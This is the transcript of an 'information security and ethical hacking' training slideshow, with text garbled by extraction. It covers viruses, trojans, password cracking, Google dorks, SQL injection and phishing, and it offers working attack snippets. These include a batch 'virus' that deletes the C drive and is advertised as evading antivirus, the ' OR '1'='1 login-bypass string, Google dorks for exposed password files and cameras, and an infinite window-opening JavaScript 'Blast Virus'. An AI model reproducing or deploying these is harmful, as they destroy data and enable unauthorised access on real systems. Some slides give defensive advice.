Atl education foundation Information Security Training - PowerPoint PPT Presentation

About This Presentation
Title:

Atl education foundation Information Security Training

Description:

atl education foundation, it security training, it security franchise, network security, information security institute, it security institute, tech, science – PowerPoint PPT presentation

Number of Views:235

less

Transcript and Presenter's Notes

Title: Atl education foundation Information Security Training


1
INFORMATION SECURITY
How secure are you?
2
Agenda
  • Networks Exposure to Security Threats
  • What is Information Security And Ethical Hacking
  • Two Major Aspects - Desktop Internet Security
  • Live Demonstrations of Attacks

3
Networks Exposures To Threats
By the end of 2015, 95 of enterprises will be
infected with undetected, financially motivated,
targeted threats that evaded their traditional
perimeter and host defenses- By Gartner, Top Ten
Key Predictions, 2012
security predictions in 2012
4
Two Major Aspects Of Security
Desktop and internet security
5
Make Dangerous Virus In A Minute
We will create this virus using batch
file programming. This virus will delete the C
Drive completely. The good thing about this virus
is that it is not detected by antivirus. 
1. Open Notepad and copy below code into it.
6
Open Notepad and copy below code into it
_at_Echo offDel C\ . y
7
Cracking Login Password
  • Cracking Tools
  • ERD Commander
  • PH Crack
  • and many more
  • The Passwords are stored in SAM file

SAM Security Account Manager
8
OR we can Change the Password
C\gt net user username password
  • You need the admin rights !
  • But you can change Passwords of Other Admin
    Users !

Thats easy but admin rights hm
9
Virus Worms
Trojan Horse
Keylogger
The three major threats to computer world!!
10
AND
Symptoms
  • Worms
  • These generally dont perform any malicious
    activity.
  • They reside in the system and make copies of
    itself
  • These eat up the system resources
  • The system might start hanging.
  • Softwares and applications often starts crashing
  • System may become unpredictable.
  • In some extreme cases OS may also crash.

Today almost 87 of all viruses/worms are spread
through the Internet.
11
Lets Code a Virus ! !
Is it difficult ?
12
Trojan Horse
  • A Trojan is an infection that steals
    information.
  • It then sends the information to a specified
    location over the internet.
  • It makes the computer prone to hackers by
    making Backdoors.

Attacker
Victim
Trojan is a fatal gift !
13
KEYLOGGER
  • They log all the keys that you type.
  • This runs in the background and is totally
    invisible.
  • Trojans often have the keyloggers with them and
    they mail the log to their masters.

Watch your key strokes!
14
Windows Registry
  • All initialization and configuration
    information used by windows are stored in the
    registry.

Know how change in registries effects your
system!
15
Network Scanners
  • Network Scanners used to find all the live
    systems present in the network with the
    Information about IP Address, Port Number,
    Services running on that ports, Vulnerabilities,
    installed applications etc.
  • Some Tools-
  • Angry IP Scanner
  • GFI LAN Guard
  • Look At LAN

Finding live Hosts!
16
Sniffers
  • Sniffers used to Capture the data packet from
    the network by applying some Poisoning such as
    ARP Poisoning.
  • Some Tools-
  • Cain and abel
  • Ettercap

hmmmmmmmmmm!
17
Cryptography
  • Art of Secret writing to convert
    plaintext(Readable format) into cipher
    text(Non-Readable format) by using some
    algorithms with the help of a Key.

Encrypters!
18
Stagenography
  • Art of Secret writing to Hide one file behind
    the other file. Example a text message can be
    bind behind the image or video file.

Hiding..
19
How Do I Protect My Data ?
  • Use Antiviruses with Updated Signatures
  • Use Firewalls
  • Do not open Untrusted executables
  • Use Cryptography Techniques

I will mess it up!
20
Lets move to internet
World Wide Web
21
Web Developers Nightmare
Remote System Scanning
Google Hacking
DNS Spoofing
SQL Injection
DOS Attack
Website Exploits
22
Google CrackingUsing Google
  • Google is more than just a Search Engine.
  • Special keywords can perform better Searches.
  • ltGoogle Commandsgt
  • site, intitle, filetype, allintitle, inurl

Google crawls the web !
23
Database Cracking
Hmmmmmmmmmmm..
24
Advance Googling
Filetypexls hry.nic.in
25
Password Cracking
Intitleindex .of master.passwd
26
Camera Cracking
Inurlindexframe.shtml axis
27
SQL attack
Backend SQL string
Select from table where user "
TextBox1.Text AND pass '" TextBox2.Text

' OR '1''1
? ? ? ? ? ? ? ? ? ? ?
String after SQL Injection
Select from table where user OR 11
AND pass OR 11
Lets see how is this done!
We Know that is always True!
user OR 11 AND pass
OR 11
Lets see how a simple SQL injection works
28
Surfing Online
Browser Hacking
Phishing
Fake Emails
Social Networking Abuse
Dangers for Internet Users
29
Browser Cracking
  • Use scripts links to run in Browser.
  • These scripts change the behavior of Browser.
  • Example
  • javascriptR0 x1.1 y1.05 x2.25
    y2.24 x31.6 y3.24 x4300 y4200 x5300
    y5200 DIdocument.images DILDI.length
    function A()for(i0 iltDIL i)DISDI i
    .style DIS.position'absolute'
    DIS.leftMath.sin (Rx1ix2x3)x4x5
    DIS.topMath.cos(Ry1iy2y3)y4y5RsetInterv
    al('A()',5) void(0)
  • javascriptb adocument.images
    for(wt0 wtlta.length wt)awt.style.position
    'relative' bb.lengthawt j0
    setInterval('j for(wt0 wtltb.length
    wt)bwt.style.leftMath.sin((6.28/a.length)wt
    j/10)10 void(0)',1) void(0)

Lets Do It.........
30
Blast Virus
  • lthtmlgt
  • ltbodygt
  • ltscript language"javascript"gt
  • while(1)
  • w1window.open()
  • w1.document.write("ltcentergtltfont colorred
    size5gt blaaaast!!lt/fontgtlt/centergt")
  • lt/scriptgt
  • lt/bodygt
  • lt/htmlgt

Lets Do It.........
31
Fake Emails
  • Sending Fake mails with Fake headers
  • E-mails can be sent to anyone from any Id
  • It is used also in Spamming

Lets Send a Fake Email !
Its bush_at_georgebush.com ...
32
How to Catch Fake Emailers
  • Analyze the headers
  • Use sites like
  • whatismyipaddress.com to trace the IP address
    of fake mail
  • Go to Regional Internet Registries like Apnic,
    Afrinic, etc.
  • Get the email of ISP of attacker lodge the
    complaint.

Catch me if u can
33
Phishing Attack
E-mail Theres a problem with your Gmail
account
Password sent
Password?
User thinks its Gmail.com (But its Gmail.org)
Lets make a fake page
34
Preventing Phishing
  • Read the URL carefully
  • Keep a suspicious eye over info demanding
    E-mails.
  • Anti-phishing Tools can be effective

Use your Brain
35
Thank You For any query and assistance, Kindly
contact Appin Technology lab
This is just a Trailer movie is about to Begin
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Atl education foundation Information Security Training" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!